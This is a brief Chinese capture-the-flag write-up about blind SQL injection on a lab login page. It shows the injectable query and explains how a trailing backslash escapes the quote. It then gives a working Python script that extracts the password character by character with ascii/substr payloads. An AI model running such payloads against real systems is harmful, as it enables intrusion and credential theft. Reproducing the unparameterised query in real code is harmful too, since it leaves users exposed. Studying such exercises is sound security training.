盲注
后台源码
select * from users where username='$_POST["username"]' and password='$_POST["password"]';
对前面进行反斜杠可以转义字符’
select * from users where username='admin\' and password='or/**/length(database())>0#';
登录不同回显不同
脚本
import requests
import time
url = "http://e93a4c52-4dfd-4bb1-afc3-b9f20eea580e.node3.buuoj.cn/index.php"
anser = "BJD needs to be stronger"
flag = ""
data = {
'username':'admin\\',
'password':''
}
for i in range(1,50):
time.sleep(1)
high = 127
low = 32
mid = (high+low)//2
while high>low:
payload="or/**/if(ascii(substr(password,{},1)>{},1,0)".format(i,mid)
data['password']=payload
response = requests.post(url=url,data=data)
if anser in response.text:
low = mid+1
else:
high = mid
mid = (high+low)//2
flag += chr(mid)
print(flag)
若有收获,就点个赞吧
0 人点赞
